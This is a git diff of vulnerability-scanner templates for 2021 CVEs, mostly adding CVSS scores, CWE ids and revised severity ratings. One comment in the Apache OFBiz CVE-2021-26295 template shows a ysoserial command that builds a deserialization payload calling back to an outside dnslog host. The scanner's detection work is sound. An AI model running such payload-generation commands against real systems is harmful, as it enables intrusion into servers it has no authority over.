CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24335 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml index a20c217e53..498fb61986 100644 --- a/cves/2021/CVE-2021-24340.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -3,13 +3,18 @@ id: CVE-2021-24340 info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection author: lotusdll - severity: critical + severity: high description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24340 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml index fa60b34342..8d0e643b50 100644 --- a/cves/2021/CVE-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -10,6 +10,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress reference: https://cxsecurity.com/issue/WLB-2021070041 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24387 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index 3b6b1bb833..024f7e7b87 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -7,6 +7,11 @@ info: description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24389 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml index 5ef2b21f2c..5663561a64 100644 --- a/cves/2021/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -5,8 +5,13 @@ info: author: 0x_Akoko description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 - severity: low + severity: medium tags: wordpress,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24406 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index b45ea11b81..634ca3ad27 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -4,9 +4,14 @@ info: author: Suman_Kar name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. - severity: high + severity: critical reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a tags: cve,cve2021,wordpress,lfi,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24472 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 4a5b9a1610..19e4bf5b0d 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -9,6 +9,11 @@ info: reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index 64eccc35f9..249ee3cb41 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24498 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 9b24744f57..3636534b7b 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml @@ -7,6 +7,11 @@ info: reference: http://hackdig.com/02/hack-283902.htm description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. tags: cve,cve2021,saltapi,rce,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-25281 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index ca62a13683..6c596f1aad 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -3,12 +3,17 @@ id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu - severity: critical + severity: high reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 requests: - raw: diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 54134b92e1..223055583e 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -11,6 +11,11 @@ info: - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index d0462007ca..b1cf4c5442 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-26086 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index cef67180f6..ab08b76304 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -13,6 +13,11 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26295 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml index bc9d4332f5..197a0e35f5 100644 --- a/cves/2021/CVE-2021-26475.yaml +++ b/cves/2021/CVE-2021-26475.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf severity: medium tags: cve,cve2021,xss,eprints + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26475 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml index ed5fc3662d..df2e680cab 100644 --- a/cves/2021/CVE-2021-26710.yaml +++ b/cves/2021/CVE-2021-26710.yaml @@ -7,6 +7,11 @@ info: description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. reference: https://vict0ni.me/report2web-xss-frame-injection.html tags: cve,cve2021,redwood,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26710 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml index 3b867adacd..72c53cc241 100644 --- a/cves/2021/CVE-2021-26722.yaml +++ b/cves/2021/CVE-2021-26722.yaml @@ -7,6 +7,11 @@ info: description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. reference: https://github.com/linkedin/oncall/issues/341 tags: cve,cve2021,linkedin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26722 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml index 7358094f07..8372fc51ee 100644 --- a/cves/2021/CVE-2021-26723.yaml +++ b/cves/2021/CVE-2021-26723.yaml @@ -11,6 +11,11 @@ info: - https://jenzabar.com/blog - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328 tags: cve,cve2021,jenzabar,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26723 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index 032841467b..e8d74a17dc 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26812 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 2b7a25ea5d..f2b5e87856 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -12,6 +12,10 @@ info: - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26855 requests: - raw: diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0f16811c2a..5718543b60 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -3,9 +3,17 @@ id: CVE-2021-27132 info: name: CRLF Injection - Sercomm VD625 author: geeknik - severity: medium + severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27132 + cwe-id: CWE-74 + reference: + - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + - http://sercomm.com requests: - method: GET diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index b356cf909a..4f26fcca3a 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -7,6 +7,11 @@ info: description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-27330 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml index 0b53b90095..0bd9968499 100644 --- a/cves/2021/CVE-2021-27651.yaml +++ b/cves/2021/CVE-2021-27651.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 severity: critical tags: cve,cve2021,pega,auth-bypass + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27651 + cwe-id: CWE-287,CWE-640 requests: - method: GET diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index cba085815d..44b1b651c3 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -9,6 +9,11 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 tags: cve,cve2021,apache,tapestry + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27850 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index b14c3ad7df..7d28fe62e8 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -3,7 +3,7 @@ id: CVE-2021-27905 info: name: Apache Solr <= 8.8.1 SSRF author: hackergautam - severity: medium + severity: critical tags: cve,cve2021,apache,solr,ssrf description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. reference: @@ -11,6 +11,11 @@ info: - https://ubuntu.com/security/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index 33dd3f51b9..5529e9a825 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 tags: cve,cve2021,hongdian,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-28149 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index b16d0b19a0..0970614363 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -9,6 +9,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2021-28150 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 34b2b86083..60ffa8230b 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-28151 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 40408c866b..35d226536b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -10,6 +10,11 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28164 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index e88a103bc6..2c4b5ba010 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -10,6 +10,11 @@ info: description: | For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28169 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index d591e23f66..ae168da091 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -10,6 +10,11 @@ info: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2021-28918 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml index 30132099ca..7c00cd061c 100644 --- a/cves/2021/CVE-2021-28937.yaml +++ b/cves/2021/CVE-2021-28937.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - severity: medium + severity: high tags: cve,cve2021,acexy,disclosure,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-28937 + cwe-id: CWE-312 requests: - method: GET diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml index b92aededf1..976a0d7a51 100644 --- a/cves/2021/CVE-2021-29156.yaml +++ b/cves/2021/CVE-2021-29156.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2021,openam description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. reference: https://blog.cybercastle.io/ldap-injection-in-openam/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29156 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 46e6805abe..4a1d38914d 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29203 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml index ac947cde4f..87203f1c21 100644 --- a/cves/2021/CVE-2021-29441.yaml +++ b/cves/2021/CVE-2021-29441.yaml @@ -11,9 +11,14 @@ info: This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. author: dwisiswant0 - severity: high + severity: critical reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29441 + cwe-id: CWE-290 requests: - raw: diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml index 81a6d3fc5d..7b61103f73 100644 --- a/cves/2021/CVE-2021-29442.yaml +++ b/cves/2021/CVE-2021-29442.yaml @@ -10,6 +10,11 @@ info: severity: high reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 51791de0f0..c76ead0c70 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index ff5a0b4b8a..95b34e9478 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 severity: medium tags: cve,cve2021,prometheus,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29622 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 26175c05d3..d5e3bd655d 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml @@ -9,6 +9,11 @@ info: - https://sourceforge.net/p/adminer/bugs-and-features/797/ - https://www.cvedetails.com/cve/CVE-2021-29625/ tags: cve,cve2021,adminer,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29625 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 5b47b94607..c1251e9592 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -3,12 +3,17 @@ id: CVE-2021-30151 info: name: CVE-2021-30151 author: DhiyaneshDk - severity: low + severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss,sidekiq + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-30151 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0168388bab..5a60c6d460 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -9,6 +9,10 @@ info: - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 tags: cve,cve2021,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3017 requests: - method: GET diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index 67895708da..c642949eea 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -3,12 +3,17 @@ id: CVE-2021-3019 info: name: Lanproxy Directory Traversal author: pikpikcu - severity: medium + severity: high description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet. reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 tags: cve,cve2021,lanproxy,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3019 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 6de9e167ab..a5bbb3a5a1 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -7,6 +7,11 @@ info: description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-30461 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml index 64112f9e82..f25315a536 100644 --- a/cves/2021/CVE-2021-31249.yaml +++ b/cves/2021/CVE-2021-31249.yaml @@ -7,6 +7,10 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 severity: medium tags: cve,cve2021,chiyu,crlf,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + 